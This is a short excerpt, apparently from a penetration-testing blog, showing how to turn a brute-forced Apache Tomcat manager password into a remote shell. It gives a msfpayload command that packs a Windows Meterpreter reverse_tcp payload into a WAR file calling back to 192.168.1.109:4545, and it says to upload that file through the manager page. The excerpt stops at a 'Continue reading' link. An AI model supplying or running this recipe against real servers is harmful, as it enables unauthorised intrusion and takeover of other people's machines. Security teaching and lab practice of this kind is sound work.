Tomcat

So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

1./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect… Continue reading